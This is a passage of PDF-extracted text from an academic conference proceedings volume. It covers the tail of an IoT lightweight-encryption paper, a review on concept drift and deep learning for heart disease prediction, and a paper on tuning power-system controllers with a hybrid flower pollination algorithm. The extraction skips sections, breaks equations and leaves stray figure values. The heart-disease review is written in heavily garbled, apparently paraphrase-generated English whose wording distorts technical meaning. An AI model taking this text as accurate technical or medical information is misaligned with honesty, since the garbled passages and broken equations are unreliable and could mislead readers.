cryptographic algorithm in the proposed novel architecture done using Arduino IDE
over ESP32. The results confirm that lightweight novel IoT architecture consumes
1.31 MB of flash and 32.77 KB SRAM. SIT cryptographic algorithm consumes 22
bytes of memory and faster encryption and decryption of 0.376 ms. Thus the proposed
novel architecture guarantees a lightweight security in the lightweight novel IoT
architecture.
References
1. Zhang, P. Y., Zhou, M. C., & Fortino, G. (2018). Security and trust issues in fog computing:
A survey. Future Generation Computer Systems, 88, 16–27. https://doi.org/10.1016/j.future.
2018.05.008
2. Dall, C., & Nieh, J. (2014). KVM/ARM. ACM SIGPLAN Notices, 333–348. https://doi.org/
10.1145/2644865.2541946.
3. Cheruvu, S., Kumar, A., Smith, N., & Wheeler, D. M. (2019). Demystifying Internet of Things
Security: Successful IoT Device/Edge and Platform Security Deployment (1st ed.). Apress.
https://doi.org/10.1007/978-1-4842-2896-8.
4. Iqbal, A., Sadeque, N., & Mutia, R.I. (2010). An Overview of microkernel, hypervisor and
microvisor virtualization approaches for embedded systems.
5. Tiburski, R. T., Moratelli, C. R., Filho, S. J., Neves, M. V., Matos, E. D., Amaral, L., &
Hessel, F. (2019). Lightweight security architecture based on embedded virtualization and
trust mechanisms for IoT edge devices. IEEE Communications Magazine, 57, 67–73.
156 P. Mishra et al.
6. Pinto, S., Gomes, T., Pereira, J., Cabral, J., & Tavares, A. (2017). IIoTEED: An enhanced,
trusted execution environment for industrial IoT edge devices. IEEE Internet Computing, 21,
40–47.
7. Dai, W., Jin, H., Zou, D., Xu, S., Zheng, W., Shi, L., & Yang, L. T. (2015). TEE: A virtual DRTM
based execution environment for secure cloud-end computing. Future Generation Computer
System, 49, 47–57.
8. Mishra, P., & Yadav, S. K. (2020) Threats and vulnerabilities to IoT end devices architecture and
suggested remedies. International Journal of Recent Technology and Engineering. 8(6):5712–
5718. https://doi.org/10.35940/ijrte.f9469.038620
9. Amoroso, E. G. (2011). Cyber attacks: Awareness. Network Security, 2011(1), 10–16. https://
doi.org/10.1016/s1353-4858(11)70005-8
10. Mounika, M., & Chinnaswamy, C. N. (2016). A comprehensive review on embedded
hypervisors. IJARCET., 5(5), 1546–1550.
11. Cerdeira, D., Santos, N., Fonseca, P., & Pinto, S. (2020). SoK: Understanding the prevailing
security vulnerabilities in trust zone-assisted TEE systems. IEEE Symposium on Security and
Privacy (SP), 2020, 1416–1432.
12. Shapsough, S., Aloul, F., & Zualkernan, I. (2018). Securing low-resource edge devices for IoT
systems. International Symposium in Sensing and Instrumentation in IoT Era (ISSI), 2018,
1–4.
13. Guan, L., Liu, P., Xing, X., Ge, X., Zhang, S., Yu, M., & Jaeger, T. (2017). TrustShadow:
Secure execution of unmodified applications with ARM TrustZone. In Proceedings of the 15th
Annual International Conference on Mobile Systems, Applications, and Services.
14. Usman, M., Ahmed, I., Aslam, M., Khan, S., & Shah, U. (2017). SIT: A lightweight encryption
algorithm for secure ınternet of things. ArXiv, abs/1704.08688.
15. Jones, M. (2013). Virtualization for embedded systems The how and why of small-device
hypervisors.
16. Poettering, B. (2007) Rijndael furious AES-128 ımplementation for AVR devices (2007). http://
point-at-infinity.org/avraes/.
17. Eisenbarth, T., Gong, Z., Güneysu, T., Heyse, S., Indesteege, S., Kerckhof, S., Koeune, F., Nad,
T., Plos, T., Regazzoni, F., Standaert, F., & Oldenzeel, L.V. (2012). Compact ımplementation
and performance evaluation of block ciphers in ATtiny devices. AFRICACRYPT.
18. Koo, W., Lee, H., Kim, Y.H., & Lee, D. (2008). Implementation and analysis of new lightweight
cryptographic algorithm suitable for wireless sensor networks. In 2008 International Confer-
ence on Information Security and Assurance (isa 2008) (pp. 73–76).
19. Guimarães, G., Souto, E., Sadok, D., & Kelner, J. (2005). Evaluation of security mechanisms
in wireless sensor networks. Systems Communications, 2005, 428–433.
Addressing Concept Drifts Using Deep
Learning for Heart Disease Prediction:
A Review
Abstract Heart disease is definitely among the many most significant triggers of
morbidity and fatality amid the populace among the globe. Prediction of cardiac
disease can be considered as one particular among the most crucial topics in the
sector of medical info evaluation. The quantity of data through the medical industry
is very large. Deep learning becomes the huge range of natural medical care data
straight to data which usually may support to identify possibilities and forecasts. This
paper reveals the novel algorithm and performance methodology that can forecast
the heart disease by ways of CNN modeling. The parameters evaluation will be
done for accuracy, sensitivity, specificity, and positive prediction value (PPV). Such
parameters can be used in a user-friendly manner by doctors to trace out the possibility
of diseases.
1 Introduction
Machine learning [1, 2] makes use of historic data to determine patterns that show
dangerous behavior in inbound data channels. Pertaining to several functions of
machine learning, where these kinds of patterns possibly perform certainly not alter
or perhaps transform gradually through period, the removal of patterns via the recent
to forecast long-term events is usually not a trigger for challenge [3, 4].
The real-world data are normally non-stationery. In many difficult data evaluation
uses, data develop throughout period and need to end up being examined in near
real time [5]. This triggers complications since the forecasts may turn into much less
correct as the point in time goes by or possibilities to enhance the precision may be
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 157
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_13
158 K. S. Desale and S. V. Shinde
skipped. Concept drift relates to scenario in the event that the relationship among
the insight data and the focus on shifting, that any model is usually attempting to
alterations overtime. Drifts are categorized improvements straight to both temporary
and long term [6]. Temporary drifts will be nothing at all however, the switch will get
show up at optimum period and so after that, it solves the method whereas Long term
Drifts happen to be it steadily shifts the entire process which interferes with the event
records while operating the features [7]. In pattern identification, any event is known
as covariate shift and dataset change. In signal control, the occurrence is alluded to as
non-stationary. Changes in underpinning data manifest on account of the changing
individualized motivations, variations in populace, hostile actions or perhaps they
can end up being linked to a complicated element of the situations [8, 9].
The challenge of concept drift is certainly of strengthening significance as a grow-
ing number of data are structured in the mode of data streams alternatively as opposed
to stationary sources, and it is impractical to foresee that data allocation stays steady
through a prolonged time frame. It is not astonishing that the issue of concept drift
is analyzed in different research areas including however, absolutely not limited to
pattern mining, machine learning and data mining, data channels, data recuperation,
and so recommended systems [10].
Several techniques intended for identifying and managing concept drift are gen-
erally recommended in investigation literature, and so several of them feature cur-
rently and validated their particular capabilities in a huge area concerning applica-
tion domains. A further circumstance is learning through the occurrence of obscured
parameters. Individual modeling is certainly among the lots of preferred learning
functions, exactly where the learning strategy constructs a unit of the individual
goals, which obviously are certainly not visible and can transform occasionally [12].
Drift likewise develops during monitoring tasks and predictive service. Learning the
patterns is among a model just where degradation or perhaps decay of technical por-
tions arises eventually. Concept drift is utilized as a universal terminology to explain
computational challenges with changes over time. Such alterations might be of many
distinct aspects and so certainly, there are several categories of functions which usu-
ally necessitate numerous adaptation approaches [13]. Numerous choices of tasks
may perhaps be needed based on the planned utility seeing that regression, position,
classification, uniqueness diagnosis, clustering, and program set exploration. Con-
jecture causes assurance about the future, or perhaps regarding undiscovered features
concerning the present. Predictions can be almost certainly the very prevalent usage
of data mining, and it addresses regression and distinction steps. Regression [14,
15] is ordinarily viewed as through requirements forecasting, reference scheduling
optimization, individual modeling, and so, generally, in functions, in which the key
target is to foresee potential patterns of prospects. Ranking can be a unique kind of
auguration, where partially ordering of alternate options is expected. Classification
can be a standard task in prognosis as well as decision services, for case in point,
antibiotic reluctance conjecture, fake data distinction, or perhaps fake news detection
[16]. Positioning is a general process in endorsement, data recuperation, record rat-
ing, and opinion learning programs areas. Regression and positioning classification
Addressing Concept Drifts Using Deep Learning … 159
are actually supervised learning duties, just where models are trained on cases, where
the ground truth is obtainable [17].
Furthermore, in medical domain uses, concept drifts (CD) requires to be consid-
ered as a predictive model for disease prediction, drug prediction, survival prediction,
etc. Hence, this paper signifies the research methodology intended for prediction of
human heart predicament in terms of several electrocardiogram (ECG) elements.
2 Literature Review
the different QRS detection algorithms informed in the literature, the evolution of a
productive QRS detector continues to be an issue in the medical ground.
Zero-crossing techniques are effective to prevent noises and so are specifically
practical for specific accuracy arithmetic. This diagnosis approach follows the effec-
tiveness as well as delivers a substantial level of discovery effectiveness also in very
deafening ECG signals. In this procedure, the starting up of a happening is discovered
when the abilities of the signal fit down below a signal adaptive tolerance while the
outcome is determined in the event that the signal goes up over the threshold. This
beginning and then end of the occurrence identify the bounds of the query process
meant for the eventual localization among the R-wave. In the event, nearby events are
temporally extremely close, and they are going to be merged straight to one particular
solitary event. The starting point of the combined event is the starting of the initial
event, and the closure of the merged occurrence is the outcome of the closing occur-
rence. The tolerance per phase applied for pinpointing the range of zero-crossings is
predetermined and so estimated empirically [23]. Author formulated a new approach
for QRS complex detection of ECG signals, employing particle swarm optimization
(PSO)-based adaptable filter (AF). In the recommended technique, the AF, struc-
tured on PSO, is utilized to create the element. A competent discovery algorithm
formulated with look backs to get neglected peaks [24].
At the time of different analysis, author carried out ECG signal preprocessing
and SVM structured arrhythmic beat distinction that are achieved to identify straight
to regular as well as unnatural matters. In ECG signal preprocessing, a detained
problem normalized LMS adaptable filter is used to obtain high-speed and poor
latency pattern by way of reduced computational features. Seeing that the signal
control approach is formulated for distant medical units, white noises extraction is
primarily targeted. Individual wavelet transform is employed with the preprocessed
signal meant for HRV element removal as well as machine learning approaches are
employed intended for accomplishing arrhythmic beat distinction [25]. Table 1 is
summarizing some of the ECG signal evaluation methods.
Author designed new version for PhysioNet/CinC challenge that aspires to encour-
age the refinement of prestigious algorithms to sort out regardless a concise single-
lead ECG logging reveals natural sinus rhythm, atrial fibrillation (AF), an alternative
rhythm, or perhaps is overly noisy to remain categorized. The procedure proclaimed
by author combines time details acquired via QRS detection by features via a stronger
process estimator and waveform aspects employing a random forest classer. Hence,
the objective of this research is to find out research gap as shown in Table 2 and
develop methodology for prediction with the classification of ECG elements.
3 Research Methodology
The heart disease continues to be among the significant triggers of fatality around
the world. The heart disease diagnosis is costly currently; consequently, it is vital
to foresee the issues of gaining heart disease because of specific boasts. The feature
Addressing Concept Drifts Using Deep Learning … 161
In the event that enhanced data are available, the conjecture model will be imple-
mented for recognition of forecasted heart conditions. In the case there is simply no
disorders prediction value, and consequently recurrent concept drift can be carried
out until model results in being prediction outcomes. For conjecture values, hyper-
parameters will be placed for absolute training of dataset. Furthermore, for training,
the validation evaluation can be executed to evaluate proposed system results with
existing information of outcomes.
References
1. Zenisek, J., Holzinger, F., & Affenzeller, M. (2019). Machine learning based concept drift
detection for predictive maintenance. Computers & Industrial Engineering, 137.
2. de Mello, R. F., et al. (2019). On learning guarantees to unsupervised concept drift detection
on data streams. Expert Systems with Applications, 117, 90–102.
3. Cejnek, M., & Bukovsky, I. (2018). Concept drift robust adaptive novelty detection for data
streams. Neurocomputing, 309, https://doi.org/10.1016/j.neucom.2018.04.069.
4. Maria De Marsico, A. P., & Ricciardi, S. (2016). Iris recognition through machine learning
techniques: A survey. Pattern Recognition Letters, 82, (Part 2), 106–115. ISSN 0167-8655.
https://doi.org/10.1016/j.patrec.2016.02.001.
5. Demšar, J., & Bosnić, Z. (2018). Detecting concept drift in data streams using model explana-
tion. Expert Systems with Applications, 92, 546–559.
6. Lu, Y., Cheung, Y.-M., & Tang, Y. Y. (2019). Adaptive chunk-based dynamic weighted majority
for imbalanced data streams with concept drift. IEEE Transactions on Neural Networks and
Learning Systems.
166 K. S. Desale and S. V. Shinde
7. Lin, L., et al. (2019). Concept drift based multi-dimensional data streams sampling method. In
Pacific-Asia Conference on Knowledge Discovery and Data Mining. (Vol. 11439, pp. 331–342).
LNAI.
8. Roveri, M. (2019). Learning discrete-time Markov chains under concept drift. IEEE Transac-
tions on Neural Networks and Learning Systems, 30(9), 2570–2582. https://doi.org/10.1109/
TNNLS.2018.2886956.
9. Ryan, S., Corizzo, R., Kiringa, I., & Japkowicz, N. (2019). Deep learning versus conventional
learning in data streams with concept drifts. In 18th IEEE International Conference On Machine
Learning And Applications (ICMLA) (pp. 1306–1313). Boca Raton, FL, USA. https://doi.org/
10.1109/ICMLA.2019.00213.
10. Liu, A., Lu, J., & Zhang, G. (2020). Diverse instance-weighting ensemble based on region
drift disagreement for concept drift adaptation. IEEE Transactions on Neural Networks and
Learning Systems,. https://doi.org/10.1109/TNNLS.2020.2978523.
11. Yang, Z., Al-Dahidi, S., Baraldi, P., Zio, E., & Montelatici, L. (2020). A novel concept drift
detection method for incremental learning in nonstationary environments. IEEE Transactions
on Neural Networks and Learning Systems, 31(1), 309–320. https://doi.org/10.1109/TNNLS.
2019.2900956.
12. Iwashita, A. S., de Albuquerque, V. H. C., & Papa, J. P. (2019). Learning concept drift with
ensembles of optimum-path forest-based classifiers. Future Generation Computer Systems, 95,
198–211.
13. Zhou, X., Lo, Faro W., Zhang, X., & Arvapally, R. S. (2019). A Framework to Monitor Machine
Learning Systems Using Concept Drift Detection. In: Abramowicz W., Corchuelo R. (eds)
Business Information Systems. BIS,. (2019). Lecture Notes in Business Information Processing
(Vol. 353). Cham: Springer.
14. Song, Y., Lu, J., Lu, H., & Zhang, G. (2020). Fuzzy clustering-based adaptive regression for
drifting data streams. IEEE Transactions on Fuzzy Systems, 28(3), 544–557. https://doi.org/
10.1109/TFUZZ.2019.2910714.
15. Rutkowska, D., & Rutkowski, L. (2019). On the hermite series-based generalized regression
neural networks for stream data mining. In T. Gedeon, K. Wong, M. Lee (Eds.), Neural Infor-
mation Processing. ICONIP. (2019). Lecture Notes in Computer Science (Vol. 11955). Cham:
Springer.
16. Abdualrhman, M. A. A., & Padma, M. C. (2020). Deterministic Concept drift detection in
ensemble classifier based data stream classification process. IJGHPC, 11(1), 29–48. https://
doi.org/10.4018/IJGHPC.2019010103.
17. Abdualrhman, M. A. A., & Padma, M. C. (2019). CD2A: Concept drift detection approach
toward imbalanced data stream. In V. Sridhar, M. Padma, & K. Rao (Eds.), Emerging Research
in Electronics, Computer Science and Technology Lecture Notes in Electrical Engineering
(Vol. 545). Singapore: Springer.
18. McConville, R., et al. (2018). Online heart rate prediction using acceleration from a wrist worn
wearable. arXiv:1807.04667.
19. Zhang, L., Zhao, J., & Li, W. Online and unsupervised anomaly detection for streaming data
using an array of sliding windows and PDDs. In IEEE Transactions on Cybernetics. https://
doi.org/10.1109/TCYB.2019.2935066.
20. Yu, S., et al. (2019). Concept drift detection and adaptation with hierarchical hypothesis testing.
arXiv:1707.07821.
21. Albuquerque, R. A. S., Costa, A. F. J., Miranda dos Santos, E., Sabourin, R., & Giusti, R.
(2019). A decision-based dynamic ensemble selection method for concept drift 2019. In: IEEE
31st International Conference on Tools with Artificial Intelligence (ICTAI) (pp. 1132–1139)
Portland, OR, USA. https://doi.org/10.1109/ICTAI.2019.00158.
22. Li, Z., Huang, W., Xiong, Y., Ren, S., & Zhu, T. (2020). Incremental learning imbalanced
data streams with concept drift: The dynamic updated ensemble algorithm. Knowledge-Based
Systems, 195.
23. Raj, S., Ray, K. C., & Shankar, O. (2018). Development of robust, fast and efficient QRS
complex detector: A methodological review. Australasian Physical & Engineering Sciences in
Medicine, 41, 581–600. https://doi.org/10.1007/s13246-018-0670-7.
Addressing Concept Drifts Using Deep Learning … 167
24. Jain, S., Kumar, A., & Bajaj, V. (2016). Technique for QRS complex detection using particle
swarm optimization. IET Science, Measurement & Technology, 10(6), 626–636.
25. Venkatesan, C., Karthigaikumar, P., Paul, A., Satheeskumaran, S., & Kumar, R. (2018). ECG
signal preprocessing and SVM classifier-based abnormality detection in remote healthcare
applications. IEEE Access, 6, 9767–9773. https://doi.org/10.1109/ACCESS.2018.2794346.
26. Saurav, S., Malhotra, P., Vishnu, T. V., Gugulothu, N., Vig, L., Agarwal, P., & Shroff, G. (2018).
Online anomaly detection with concept drift adaptation using recurrent neural networks. In Pro-
ceedings of the ACM India Joint International Conference on Data Science and Management
of Data (CoDS-COMAD ’18). (pp. 78–87). New York, NY, USA.: Association for Computing
Machinery. https://doi.org/10.1145/3152494.3152501.
27. Steinberg, C., Philippon, F., Sanchez, M., et al. (2019). A novel wearable device for continuous
ambulatory ECG recording: proof of concept and assessment of signal quality. Biosensors
(Basel), 9(1):17. Published 2019 Jan 21. https://doi.org/10.3390/bios9010017.
28. Zuo, J., Zeitouni, K., & Taher, Y. (2019). ISETS: Incremental Shapelet Extraction from Time
Series Stream.
29. Sahmoud, S., & Topcuoglu, H. R. (2020). A general framework based on dynamic multi-
objective evolutionary algorithms for handling feature drifts on data streams. Future Generation
Computer Systems, 102, 42–52.
30. Duda, P., Jaworski, M., Cader, A., & Wang, L. (2020). On training deep neural networks using
a streaming approach. Journal of Artificial Intelligence and Soft Computing Research, 10(1),
15–26. https://doi.org/10.2478/jaiscr-2020-0002.
31. Fedotov, A. (2019). The concept of a new generation of electrocardiogram simulators. Mea-
surement Techniques, 61, https://doi.org/10.1007/s11018-019-01576-3.
32. Anugirba, K. (2019). ECG QRS complex detector for BSN using multiscale mathematical
morphology. Journal of the Gujarat Research Society, 21(14), 655–662.
33. Liu, C., et al. (2019). Signal quality assessment and lightweight QRS detection for wearable
ECG smartVest system. IEEE Internet of Things Journal, 6(2), 1363–1374. https://doi.org/10.
1109/JIOT.2018.2844090.
34. Erdenebayar, U., Kim, Y. J., Park, J.-U., Joo, E. Y., & Lee, K.-J. (2019). Deep learning
approaches for automatic detection of sleep apnea events from an electrocardiogram. Com-
puter Methods and Programs in Biomedicine, 180.
Tailoring the Controller Parameters
Using Hybrid Flower Pollination
Algorithm for Performance
Enhancement of Multisource Two Area
Power System
Abstract The stability of the multisource interactive power generation system can
be achieved by accurately tuning the controller parameters, which regulates the
power flow in the system. This article is dedicated to a novel hybrid flower pollina-
tion algorithm applicable to regulate the proportional-integral-derivative (PID) and
proportional-integral cascaded with proportional-derivative (PIPD) controller struc-
tures integrated in the interlinked multisource two area AC-DC power systems. The
supremacy of the projected algorithm is investigated with respect to the range of
techniques discussed in the literature. The comparison parameters taken into consid-
eration are variations in tie-line power, area frequency along with the reduction in
controller errors to achieve better system stability.
1 Introduction
Electrical power generated from diverse sources like hydro, thermal, gas, solar and
wind power plants serve the consumers. However, it is a matter of fact that the
interconnection of these (AC-DC) power plants reduces the quality of power, stability
and consistency of the power system. With a view to overcome power crisis, the
power flow controller of the interlinked systems must be optimally controlled to
limit the losses in the system. Also, it is essential to ensure that the interlinked
system is working on the nominal values of system parameters such as voltage,
phase and frequency for its successful operation. It is also important to quantify the
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 169
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_14
170 M. Khatri et al.
power distribution to satisfy the load demand under balanced conditions. However,
frequent change in power requirement by load affects the area frequency and power
in the common line connecting multiple energy sources areas.
Hence, the intention here is to keep the frequency and power of the interdependent
system within the limits and make efforts to diminish the area control error to achieve
stability. The load frequency adjustment of the single/two/multiple area networks
various studies have been developed and implemented from the last few decades.
Recently, the studies are extended to the implementation of bio-inspirited algo-
rithms for the optimization of controller parameters. Some of the popular algorithms
presented by the researchers to improve the controller response are cuckoo search
algorithm (CSA) employed for the two area interdependent energy resources [1]
firefly algorithm (FA) utilized for the multi-area systems [2], genetic algorithm (GA)
for the automatic generation control system [3], practical swarm optimization (PSO)
[4], Teaching–learning-based optimization algorithm [5, 6], bacterial foraging algo-
rithm (BF) [7], artificial immune system (AIS) [8], flower pollination algorithm
(FPA) [9, 10], etc. It has been observed that due to nonlinearities/nonlinear loads the
system response shatters in terms of parameters such as high peak overshoot, large
settling time, more damping oscillations.
Thus, this paper contributes to the manipulating the PID and PIPD controller
variables for the multisource connected areas. The controller gains are refined with
proffered algorithm under varying load conditions, and its performance analysis is
compared to the recently published algorithms [11, 12].
The work is structured as: Sect. 2 illustrates the mathematical blueprint of the
multisource two area interdependent system along with its parameters. Section 3
presents the enhanced version of PID/PIPD controllers whose gains optimization
using hybrid flower pollination algorithm. Afterward a comparison of the proposed
algorithm is carried out and its performance is observed. In Sect. 4, the conclusion
about the proffer algorithm is drawn.
plant speed governor is T GH1 T GH2 , turbine speed governor reset time is T RS1 , T RS2 ,
transient droop time constant of the hydro turbine is T RH1 T RH2 , the lead time constant
of the gas turbine speed governor is X C , the lag time constant of gas speed turbine
is Y C , the gas turbine valve position is cg , the gas turbine valve position constant is
bg , gas turbine combustion reaction time hindrance T CR , the discharge volume-time
constant of gas turbine compressor is T CD , power system gain is K PS , power system
time constant is T PS , the gradational load change is PD1 PD2 . The DC power
source has the gain K DS , the power system time constant T DS .
An area control error of the presented system is given below
Each component of the area has been analyzed in frequency domain and presented
in transfer function form. The thermal speed governing system has two inputs: the
reference U T1.2 and f 1.2 and the output Eq. (2) obtained is
1
PT1.2 = UT1.2 − ∗ f 1.2 (2)
RT1.2
Similarly, for hydro and gas power units, the output obtained is Eqs. (3) and (4),
respectively.
1
PH1.2 = UH1.2 − ∗ f 1.2 (3)
RH1.2
1
PG1.2 = UG1.2 − ∗ f 1.2 (4)
RG1.2
tsim
CE1.2 = ITAE = ∫ (| f 1 | + | f 2 | + |Ptie |) ∗ t ∗ dt + Ptie (6)
0
dCE1
UH = K P1 CE1 + K I1 ∫ CE1 + K P2 CE1 + K d1 (7)
dt
Tailoring the Controller Parameters … 173
dCE1
UT = K P1 CE1 + K I1 ∫ CE1 + K P2 CE1 + K d1 (8)
dt
dCE1
UG = K P1 CE1 + K I1 ∫ CE1 + K P2 CE1 + K d1 (9)
dt
For the multi-objective optimization problems, the flower pollination algorithm
rules formulated in [14]. The plants are flourishing their species through pollination
by means of transporting pollens from one to another flower for reproduction. If the
pollinators are birds, animals, insects the pollination is biotic, else the pollinators
can be abiotic such as wind, water [15].
The biotic pollinators can move to long distances come under the category of
global pollination shows Lévy flight behavior [16] and mathematically formulated
using Lévy distribution to get the random solutions using the conventional flower
pollination algorithm [17].
On the other hand, the pollination through the abiotic pollinators called local polli-
nation can be mathematically formulated for effective convergence of solutions using
pattern search algorithm (PS) [18]. To make a decision for the pollination is global
or local, the switch probability (ρ) values fall in the range 0–1. The mathematical
expression of the global pollination using Lévy flight behavior is
X it+1 = X i (t) + γ L(ρ) G ∗ − X it (t) (10)
ρτ (ρ) sin(πρ/2) 1
L∼ (11)
π s 1+ρ
where τ (ρ) = typical gamma function, while the distribution is applicable to outsized
steps S > 0. When the arbitrary number is lower than the switching (p), the local
pollination transpires mathematically shown as
X it+1 = X i (t) X tj (t) − X kt (t) (12)
where X tj and X kt are pollen from unlike flowers of the similar species that presents
the outcome consistency in the event of local pollination. The step size can be drawn
using Eq. (13). Following the Gaussian distribution, A and B are the arbitrary numbers
and the samples can be gathered from a typical Gaussian distribution function with
174 M. Khatri et al.
1/ρ
τ (1 + ρ) sin πρ 2
σ2 = . (ρ−1)/2 (14)
ρτ 1+ρ2
2
The flowers which are closer have fair chances to be fertilized due to local polli-
nation while the flowers which are likely to be pollinated globally. Therefore, the
switch probability is used for switching among local and global pollination which is
to some extent partial toward local pollination [19]. The pattern search algorithm is
a derivative-free method to resolve the issues related to parameters upgradation. It is
based on the computation of a sequence of points, which probably approach to the
optimal solution but creates a mesh.
The mesh is a collection of points around the starting points defined by FPA. Then,
the chosen point, i.e., current best is multiplied to the scalar set off vector known as
pattern for creating the mesh, and a paramount identified objective function turns out
to be the present point for subsequent iteration. For the first iteration, the mesh volume
is initiated with scalar = 1, and then, the direction vectors are initiated [20, 21].
The FPA decides the initial point X 0 , and the direction vectors are appended
to compute the objective function whose value is computed for the smallest
possible values obtained than the initial point X 0 . However, if the objective function
successfully reaches a smaller value, then the mesh point becomes X 1 [22, 23].
Therefore, based upon the success rate of the smallest objective function, in the
second iteration, the mesh size is multiplied with higher and lower multiplier factors
to obtain the optimal solution. Thus, the feedback gain is optimized in the presented
work.
The controller gains K p , K I and K d of PID and K p1 , K I1, K d1 and K p2 of PIPD for the
multisource (6 sources) two area network are given in Table 1. Here, the system is
interlinked to through the AC tie-line only. The system parameters considered for the
optimized operation of controllers using hybrid flower pollination algorithm where
the levy’s distribution factor taken is 1.5, iterations 50 and the switching probability
0.8 to optimize the controller parameters.
The simulations are carried with the mentioned parameters in Table 1 of
controllers. The algorithms implemented for the controller tuning are differential
evolution algorithm (DE) based PID, hybrid stochastic fractal search combined
Tailoring the Controller Parameters … 175
pattern search technique (hSFS:PS) based PID, hybrid flower pollination algorithm
combined pattern search (hFPA:PS) method based PID and PIPD [20–22].
The performance comparison of the mentioned algorithms is done on the bases of
following indices, i.e., objective function ITAE, states of system frequencies (f 1,2 ),
i.e., peak overshoot (PO), peak undershoot (PU) and settling time (ST) for areas 1
and 2, respectively, with connected line power is represented in Table 3.
The obtained results of the proposed algorithm hFPA:PS-PIPD are validated
by observing the variations in the frequency which is decreased significantly as
compared to the other algorithms. It is also evident that the ITAE is minimized, and
thus, the system stability and reliability is achieved.
Moreover, the response of the system can be observed graphically as shown in
Fig. 2, the change in a rea1 frequency (f 1 ). With the proposed algorithm for PID
and PIPD controller, the system frequency achieves the steady state at the faster
rate compared to discussed methods. Figure 3 represents the variations in area 2
frequency (f 2 ), and the response of variation in tie-line power (Ptie ) is in Fig. 4.
By using the proffered method, losses can be reduced drastically and the system can
be balanced in minimum time.
0.01
-0.01
-0.02
-0.03
-0.04
DE:PID
-0.05 hSFS-PS:PID
Proposed:PID
Proposed:PIPD
-0.06
0 5 10 15 20 25 30 35 40
Time (s)
Fig. 2 Comparison of frequency variations in area-1 incorporated with PID and PIPD controller
176 M. Khatri et al.
0.01
-0.01
-0.02
-0.03
DE:PID
-0.04 hSFS-PS:PID
Proposed:PID
Proposed:PIPD
-0.05
0 5 10 15 20 25 30 35 40
Time (s)
Fig. 3 Comparison of frequency variations in area-2 incorporated with PID and PIPD controller
-3
10
2
-2
-4
-6
DE:PID
-8
hSFS-PS:PID
Proposed:PID
Proposed:PIPD
-10
0 5 10 15 20 25 30 35 40
Time (s)
Hence, the overall response of the proposed method for both the controllers is
superior. Table 2 illustrates the parameters variations associated with proposed hFPA-
PS:PIPD with possible combinations in an interdependent multisource power system
connected through an AC tie-line. It is depicted from Table 2, so the ITAE is mini-
mized along with control on area frequency and power flow in the connected line.
The settling time is also minimized with the application of proffered algorithm for
PID and PIPD controller structures.
The modified gains of PID and PIPD are presented in Table 3 of the connected
AC-DC line. The performance indices comparison is done for the considered system
in Table 4 between differential evolution algorithm based DE: I, DE: PI, DE: PID with
proposed hFPA-PS:I, hFPA-PS:PI, hFPA-PS:PID and hFPA-PS:PIPD. The following
indices, i.e., ITAE, PO (f 1,2 ), P U (f 1,2 ) and ST of areas 1, area 2, and power
variations in connected line are presented to analyze the AC-DC interdependent
system via tie-line. Again, the performance of hFPA-PS:PIPD is found better in terms
of minimizing all these parameters with respect to other combinations. Figure 5a and
b the changes in frequency can be perceived and depicted that the area frequencies
in case of AC–DC tie-line takes more time to settle down than the system only with
Tailoring the Controller Parameters … 177
AC tie-line power in Fig. 5c. However, the performance of the proffered algorithm
is appreciable because of system stability and reliability.
178
0.005
-0.005
-0.01
-0.015
Proposed:I
DE:I
-0.02
Proposed:PI
DE:PI
-0.025 Proposed:PID
DE:PID
Proposed:PIPD
-0.03
0 5 10 15 20 25 30 35 40
Time (s)
(a)
-3
10
-2
Proposed:I
DE:I
-4
Proposed:PI
DE:PI
Proposed:PID
-6 DE:PID
Proposed:PIPD
0 5 10 15 20 25 30 35 40
Time (s)
(b)
-3
10
3
-1
Proposed:I
-2
DE:I
Proposed:PI
-3
DE:PI
Proposed:PID
-4 DE:PID
Proposed:PIPD
-5
0 5 10 15 20 25 30 35 40
Time (s)
(c)
Fig. 5 Dynamic responses Frequency variations a area-1, b area-2, c Power variations in connected
areas
180 M. Khatri et al.
4 Conclusions
References
1. Abdelaziz, A. Y., & Ali, E. S. (2015). Cuckoo search algorithm based load frequency controller
design for nonlinear interconnected power system. International Journal of Electrical Power
& Energy Systems, 73, 632–643.
2. Abd-Elazim, S. M., & Ali, E. S. (2018). Load frequency controller design of a two-area system
composing of PV grid and thermal generator via firefly algorithm. Neural Computing and
Applications, 30, 607–616.
3. Al-Othman, A. K., Ahmed, N. A., Al Sharidah, M. E., & Al Mekhaizim, H. A. (2013). A hybrid
real coded genetic algorithm–pattern search approach for selective harmonic elimination of
PWM AC/AC voltage controller. International Journal of Electrical Power & Energy Systems,
44, 123–133.
4. Panda, S., Mohanty, B., & Hota, P. K. (2013). Hybrid BFOA–PSO algorithm for auto-
matic generation control of linear and nonlinear interconnected power systems. Applied Soft
Computing, 13, 4718–4730.
5. Mohanty, B. (2015). TLBO optimized sliding mode controller for multi-area multi-source
nonlinear interconnected AGC system. International Journal of Electrical Power & Energy
Systems, 73, 872–881.
6. Rao, R. V., Savsani, V. J., & Akharia, D. P. (2012). Teaching–learning-based optimization:
an optimization method for continuous non-linear large scale problems. Information Sciences,
183, 1–15.
7. Ali, E. S., & Abd-Elazim, S. M. (2011). Bacteria foraging optimization algorithm based load
frequency controller for interconnected power system. International Journal of Electrical
Power & Energy Systems, 33, 633–638.
8. Zhong, Y., & Zhang, L. (2011). An adaptive artificial immune network for supervised classi-
fication of multi-/hyper spectral remote sensing imagery. IEEE Transactions on Geo-science
and Remote Sensing, 50, 894–909.
9. Yang, X. S., Karamanoglu, M., & He, X. (2013). Multi-objective flower algorithm for
optimization. Procedia Computer Science, 18, 861–868.
Tailoring the Controller Parameters … 181
10. Draa, A. (2015). On the performances of the flower pollination algorithm–qualitative and
quantitative analyses. Applied Soft Computing, 34, 349–371.
11. Mohanty, B., Panda, S., & Hota, P. K. (2014). Controller parameters tuning of differential
evolution algorithm and its application to load frequency control of multi-source power system.
International Journal of Electrical Power & Energy Systems, 54, 77–85.
12. Padhy, S., & Panda, S. (2017). A hybrid stochastic fractal search and pattern search technique
based cascade PI-PD controller for automatic generation control of multi-source power systems
in presence of plug in electric vehicles. CAAI Transactions on Intelligence Technology, 2, 12–25.
